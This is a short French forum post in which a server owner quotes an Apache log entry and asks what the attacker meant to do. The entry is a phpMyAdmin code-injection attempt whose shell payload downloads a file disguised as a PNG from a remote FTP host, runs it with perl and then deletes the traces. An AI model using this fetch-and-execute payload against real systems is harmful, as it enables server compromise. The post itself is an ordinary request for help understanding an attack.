Bonjour,
Je ne sais pas si je poste au bon endroit… Quoi qu'il en soit, j'ai trouvé dans mes logs apache ce qui suit :
"GET /phpmyadmin/index.phpconfig/config.inc.php?eval=system('echo cd /tmp;wget ftp://testing:testing@x.x.x.x/apache_32.png;mv apache_32.png -O p2.txt;curl -O ftp://testing:testing@x.x.x.x/apache_32.png;mv apache_32.png;mv apache_32.png p.txt;lynx -DUMP ftp://testing:testing@x.x.x.x/apache_32.png;mvapache_32.png >p3.txt;perl p.txt;perl p2.txt;perl p3.txt;rm -rf *.txt'); HTTP/1.1" 404 521 "-" "curl/7.18.2 (x86_64-pc-linux-gnu)libcurl/7.18.2 OpenSSL/0.9.8g zlib/1.2.3.3 libidn/1.8 libssh2/0.18"
Qui aurait la gentillesse de m'expliquer ce que le gars a voulu faire (a fait) ?
En tout cas ça fait peur. Une info supplémentaire (…)